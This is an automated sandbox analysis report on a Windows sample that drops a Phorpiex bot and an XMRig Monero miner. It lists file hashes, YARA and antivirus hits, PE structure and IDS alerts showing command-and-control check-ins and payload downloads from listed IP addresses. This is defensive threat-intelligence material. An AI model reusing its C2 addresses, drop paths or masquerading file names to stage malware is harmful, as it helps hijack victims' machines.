Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................\|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Download File

Process:	C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\2448028260.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5827584
Entropy (8bit):	7.718261688436852
Encrypted:	false
SSDEEP:	98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
MD5:	13B26B2C7048A92D6A843C1302618FAD
SHA1:	89C2DFC01AC12EF2704C7669844EC69F1700C1CA
SHA-256:	1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
SHA-512:	D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

C:\Users\user\sysppvrdnvs.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\446629599.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	6.394560338648692
Encrypted:	false
SSDEEP:	1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
MD5:	06560B5E92D704395BC6DAE58BC7E794
SHA1:	FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
SHA-256:	9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
SHA-512:	B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysppvrdnvs.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................\|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\tbtcmds.dat

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	7.369827619940847
Encrypted:	false
SSDEEP:	6:JI+cPhYsQuLyuCFmYRhegKv12u5JRn2BtmlFnI0QBIzxN0wi4HvvL:GvhouGFredJcBsjDqIdN0wiQvT
MD5:	3DEA10446B12B8B16638C64ADEE9CF7D
SHA1:	79E5EBA41FFD6D6D0C633E9851FF2BC8B6FCAEA7
SHA-256:	E178E70155316BFFABAD28DB3DAF9F60A878243C5F3B8A59E37ADC7664F1A669
SHA-512:	5247BEFA86704AEEB1ED782F025BD9B474E14F6A83E0E2B6DD4DC8800C23788FE2CA770AEBF8F4C0C0B5BE81311A0ABF9385F182FB7D0379094FCDD565B7C56D
Malicious:	false
Preview:	y..6+....S.i...:g..(.J-j..x(..Kec..p....$...:'......u....Y.....pt."..?....2.A.xa.\|.Jor....W....Itk..S.R.>.DWE5..c...".3.FC.!o7\......Sl.k........'..l..F.M.......B..b..-..r.....[R..F. z".K..F.8x........l; ....]....Z.. !D.X.L.Y.t..#..k..y.R^o..ve.mOnsU...~o..J..mhd..

C:\Users\user\tbtnds.dat

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.857998070368649
Encrypted:	false
SSDEEP:	96:Vd9kPgnIbioHgWZbe7N8vNzsI2NQ70+UJ82Q7yngH76/Twv:L9kPDbiKLZbe7NkNzsf+UN0kw6/TO
MD5:	4D0CA3B638BEE4691515858E8421A4C8
SHA1:	CB4D7801130073F835E52D2B1E9B664CD3844360
SHA-256:	822A81CD22B1690EF877EC88F4D018FD77C8ADE1E7538804FC5CDDAC483FB334
SHA-512:	5DE57BBD331025EFACCA92FEFD79162A4E44884783D5A649D997DA304ABA626447C6994CCCA2B4CCA911E30456518080A757587398CF8B2B326161CE8EEF9EA4
Malicious:	false
Preview:	.....MT..\|...MT.F5...MT...K..MT.c....MT...g..MT>T8...MTf.....MT^.D8..MT..rY..MT.....MT.."...MT..>..MT..E...MTZ....MTN'.3..MT^..A..MT.G.(......[o...._:.....N.G.....Z......%.}B.......o....M_./.....................c.g............U.s.....mJE+....^.D....._8L....._;.f...................[.>..................M.........-X...........Z..............%.............Z...............W..V.....K!*....m.o...._9......Q_._......'(......Pi....V>.........R....^.........l\......0.....%..V....].V......?.......................C.....Z.......Z..B....)e.a.....R......N'.y............Z..7......4.....u.....^..K....U.m.......%......2.......m.....^..........<..................].S.....\.V......x.u....Z..>....\...............................M%....%.q.....%..6......~'.....D.....Z..j....Z..{.....XQ......X......U.h......K_r......<e............#H......]5.......cw....\/.....m.7.....Z..........?....-.\|q....[.\.....Z..H..............;.............6........I.............N'.........a.......I....Y.>^....

C:\Windows\sysppvrdnvs.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1706633239.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	6.394560338648692
Encrypted:	false
SSDEEP:	1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
MD5:	06560B5E92D704395BC6DAE58BC7E794
SHA1:	FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
SHA-256:	9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
SHA-512:	B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................\|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\T52Z708x2p.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	627
Entropy (8bit):	4.712975930955545
Encrypted:	false
SSDEEP:	12:RMZylQcj9dhjV39zj9dYGjV3yiuZr3KcjT+j9Cu:ZlQgbVd93bYqdLCr3KgTyL
MD5:	A7E380303453561C7007BB4A9E40C010
SHA1:	465CCCD792DF9606F8C6967A43FC88A6A3C11933
SHA-256:	8CFDE72670FB64BB47259BFF0BCE43CCFB7B381C5B0E7928B744C1D457AFD417
SHA-512:	41C07F03CF5A1DD2F7DD78A88559AF047176D683EA14D46D649DE2F31468EF0CCE5A869AB616DE814427C9187CFF14ACE721079C24B0DBABDA6F44A5303CA6B8
Malicious:	false
Preview:	First argument must be one of:.. -supported, -asm, -dis, -disadj, -gen, -apply, -genbsdiff, -applybsdiff, or -gen1[au]...Main Usage:.. courgette -gen <old_in> <new_in> <patch_out>.. courgette -apply <old_in> <patch_in> <new_out>.. courgette -genbsdiff <old_in> <new_in> <patch_out>.. courgette -applybsdiff <old_in> <patch_in> <new_out>..Diagnosis Usage:.. courgette -supported <exec_file_in>.. courgette -dis <exec_file_in> <assembly_file_out>.. courgette -asm <assembly_file_in> <exec_file_out>.. courgette -disadj <old_in> <new_in> <new_assembly_file_out>.. courgette -gen1[au] <old_in> <new_in> <patch_base_out>..

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.450515668915636
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	T52Z708x2p.exe
File size:	633'176 bytes
MD5:	cd3237b1e648d31b8761196b6c64da8a
SHA1:	2e677b7cafc3a8ee1696dddf38b176191d256559
SHA256:	ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7
SHA512:	d71338a7de6f1859edcbbd9ed0a32430e0561f8ae91883c62e6fbc4bc2d082ebd1d538312ef42543385c514ced0166c552fe211debf783f0deae82530045e4d7
SSDEEP:	12288:QmKt6DsU6ngc3kY+KC5gzwGKZ4cuQW8XQAL019bqoFARwpVp:QR8Y+sxYWkX019bqgWwpVp
TLSH:	D6D47C17E25511FDD06AD17D8B469922F6B178060B35BAEF039053272F2BAE45F3EB20
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d................."......F...$....... .........@.............................0............ ........................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x1400a2000
Entrypoint Section:	.zero
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0xDEAD [Thu Jan 1 15:50:05 1970 UTC]
TLS Callbacks:	0x40050a40, 0x1
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	c07e5efde56d9f1c0ef5ac77ff9467b8

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
dec eax
sub esp, 00000A78h
call 00007F5DE1554599h
dec eax
mov dword ptr [esp+000002B0h], eax
dec eax
cmp dword ptr [esp+000002B0h], 00000000h
jne 00007F5DE15535D7h
jmp 00007F5DE1553E16h
inc ebp
xor ecx, ecx
inc ecx
mov eax, 00000001h
mov edx, 9B102E2Dh
dec eax
mov ecx, dword ptr [esp+000002B0h]
call 00007F5DE1554266h
dec eax
mov dword ptr [esp+00000820h], eax
dec eax
cmp dword ptr [esp+00000820h], 00000000h
jne 00007F5DE15535D7h
jmp 00007F5DE1553DE3h
dec esp
mov ecx, dword ptr [esp+00000820h]
inc ecx
mov eax, 00000001h
mov edx, 526E0DCDh
dec eax
mov ecx, dword ptr [esp+000002B0h]
call 00007F5DE155422Eh
dec eax
mov dword ptr [esp+00000748h], eax
dec eax
cmp dword ptr [esp+00000748h], 00000000h
jne 00007F5DE15535D7h
jmp 00007F5DE1553DABh
dec esp
mov ecx, dword ptr [esp+00000820h]
inc ecx
mov eax, 00000001h
mov edx, C4B4A94Dh
dec eax
mov ecx, dword ptr [esp+000002B0h]
call 00007F5DE15541F6h
dec eax
mov dword ptr [esp+00000858h], eax
dec eax
cmp dword ptr [esp+00000858h], 00000000h
jne 00007F5DE15535D7h
jmp 00007F5DE1553D73h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x8cbe8	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8cc40	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9f000	0x490	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x98000	0x4ba8	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x96e00	0x1b58
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa0000	0x1158	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8b4a4	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8ae98	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7e460	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d098	0x3e0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x745f6	0x74600	bb18d9d41a6e04c7cdcc334f324247d5	False	0.5197179611976369	data	6.449172075852484	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x76000	0x1aa24	0x1ac00	6624e8aa113f3c6158ee90c995e1c67d	False	0.44267486857476634	data	5.211848354905291	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x91000	0x6148	0xe00	d74859161c07afd071382a27a1e5728c	False	0.19224330357142858	data	2.611454883167632	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x98000	0x4ba8	0x4c00	095e5b47a71cb61fb9a501ae256109c9	False	0.4936780427631579	data	5.723195714903422	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg	0x9d000	0x10	0x200	89f9fe80cf662045be6cad4ab3fa5e2a	False	0.046875	data	0.19586940608732903	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x9e000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x9f000	0x780	0x800	f3c6d18bbebbfcecfa9d32d8ba76d421	False	0.443359375	data	4.736005233861901	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa0000	0x1158	0x1200	cf183f6a573770abd9b3f86f2ec40ba0	False	0.3763020833333333	data	5.37189445576353	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.zero	0xa2000	0x10e0	0x2000	387c8f1d79745e812550166e78d2009e	False	0.60888671875	data	6.77992155147589	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x9f0a0	0x2b4	data			0.4624277456647399
RT_MANIFEST	0x9f354	0x42c	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1008), with CRLF line terminators	English	United States	0.5037453183520599

Imports

DLL	Import
KERNEL32.dll	AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateEventW, CreateFileMappingW, CreateFileW, DecodePointer, DeleteCriticalSection, DeleteFileW, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleCP, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetEnvironmentVariableW, GetFileAttributesW, GetFileSizeEx, GetFileType, GetLastError, GetLocalTime, GetLocaleInfoW, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOEMCP, GetProcAddress, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemInfo, GetSystemTimeAsFileTime, GetTempPathW, GetTickCount, GetUserDefaultLCID, GetVersionExW, HeapAlloc, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringW, LeaveCriticalSection, LoadLibraryExA, LoadLibraryExW, LocalFree, MapViewOfFile, MultiByteToWideChar, OutputDebugStringA, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RemoveDirectoryW, ResetEvent, RtlCaptureContext, RtlCaptureStackBackTrace, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwind, RtlUnwindEx, RtlVirtualUnwind, SetEndOfFile, SetEnvironmentVariableW, SetEvent, SetFileAttributesW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, Sleep, SwitchToThread, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
SHELL32.dll	CommandLineToArgvW
SHLWAPI.dll	PathMatchSpecW
WINMM.dll	timeGetTime
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegQueryValueExW, SystemFunction036

Exports

Name	Ordinal	Address
GetHandleVerifier	1	0x1400429d0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-26T07:26:19.402093+0200	2837677	ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)	1	185.215.113.66	80	192.168.2.7	49989	TCP
2024-10-26T07:26:19.402093+0200	2853272	ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound	1	185.215.113.66	80	192.168.2.7	49714	TCP
2024-10-26T07:26:19.402093+0200	2826930	ETPRO COINMINER XMR CoinMiner Usage	2	192.168.2.7	49999	185.215.113.66	5152	TCP
2024-10-26T07:26:19.402093+0200	2837677	ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)	1	185.215.113.66	80	192.168.2.7	49795	TCP
2024-10-26T07:26:19.402093+0200	2837677	ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)	1	185.215.113.66	80	192.168.2.7	50005	TCP
2024-10-26T07:26:26.938191+0200	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.7	49714	185.215.113.66	80	TCP
2024-10-26T07:26:29.149666+0200	2856563	ETPRO MALWARE Phorpiex Domain in DNS Lookup	1	192.168.2.7	49258	1.1.1.1	53	UDP
2024-10-26T07:26:30.080927+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49732	185.215.113.66	80	TCP
2024-10-26T07:26:35.033091+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49732	185.215.113.66	80	TCP
2024-10-26T07:26:35.033091+0200	2853292	ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin	1	192.168.2.7	49732	185.215.113.66	80	TCP
2024-10-26T07:26:41.658980+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49795	185.215.113.66	80	TCP
2024-10-26T07:26:41.658980+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49795	185.215.113.66	80	TCP
2024-10-26T07:26:43.624460+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49810	185.215.113.66	80	TCP
2024-10-26T07:26:43.624460+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49810	185.215.113.66	80	TCP
2024-10-26T07:26:43.729077+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	56959	87.237.236.86	40500	UDP
2024-10-26T07:26:44.169957+0200	2837677	ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)	1	185.215.113.66	80	192.168.2.7	49810	TCP
2024-10-26T07:26:48.717330+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	56959	185.203.237.213	40500	UDP
2024-10-26T07:26:50.871840+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49810	185.215.113.66	80	TCP
2024-10-26T07:26:50.871840+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49810	185.215.113.66	80	TCP
2024-10-26T07:26:52.901261+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49857	185.215.113.66	80	TCP
2024-10-26T07:26:52.901261+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49857	185.215.113.66	80	TCP
2024-10-26T07:26:53.717070+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	56959	175.107.23.112	40500	UDP
2024-10-26T07:26:58.943016+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	56959	146.70.53.161	40500	UDP
2024-10-26T07:26:59.325870+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49857	185.215.113.66	80	TCP
2024-10-26T07:26:59.325870+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49857	185.215.113.66	80	TCP
2024-10-26T07:27:01.277687+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49906	185.215.113.66	80	TCP
2024-10-26T07:27:01.277687+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49906	185.215.113.66	80	TCP
2024-10-26T07:27:03.935506+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	56959	5.234.49.217	40500	UDP
2024-10-26T07:27:07.823960+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49906	185.215.113.66	80	TCP
2024-10-26T07:27:07.823960+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49906	185.215.113.66	80	TCP
2024-10-26T07:27:09.900851+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49950	185.215.113.66	80	TCP
2024-10-26T07:27:09.900851+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49950	185.215.113.66	80	TCP
2024-10-26T07:27:13.967750+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	56959	2.179.178.50	40500	UDP
2024-10-26T07:27:15.959104+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49982	185.215.113.84	80	TCP
2024-10-26T07:27:16.278325+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49950	185.215.113.66	80	TCP
2024-10-26T07:27:16.278325+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49950	185.215.113.66	80	TCP
2024-10-26T07:27:18.192626+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49984	185.215.113.66	80	TCP
2024-10-26T07:27:18.192626+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49984	185.215.113.66	80	TCP
2024-10-26T07:27:18.592254+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49985	91.202.233.141	80	TCP
2024-10-26T07:27:18.967050+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	56959	195.158.16.52	40500	UDP
2024-10-26T07:27:24.473008+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49988	91.202.233.141	80	TCP
2024-10-26T07:27:31.363041+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49989	185.215.113.66	80	TCP
2024-10-26T07:27:31.363041+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49989	185.215.113.66	80	TCP
2024-10-26T07:27:33.391758+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49991	185.215.113.66	80	TCP
2024-10-26T07:27:33.391758+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49991	185.215.113.66	80	TCP
2024-10-26T07:27:33.706544+0200	2837677	ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)	1	185.215.113.66	80	192.168.2.7	49991	TCP
2024-10-26T07:27:34.113951+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	65303	217.24.149.46	40500	UDP
2024-10-26T07:27:39.108008+0200	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.7	65303	88.204.217.130	40500	UDP
2024-10-26T07:27:39.164988+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49993	185.215.113.66	80	TCP
2024-10-26T07:27:39.164988+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49993	185.215.113.66	80	TCP
2024-10-26T07:27:41.095072+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49994	185.215.113.66	80	TCP
2024-10-26T07:27:41.095072+0200	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.7	49994	185.215.113.66	80	TCP
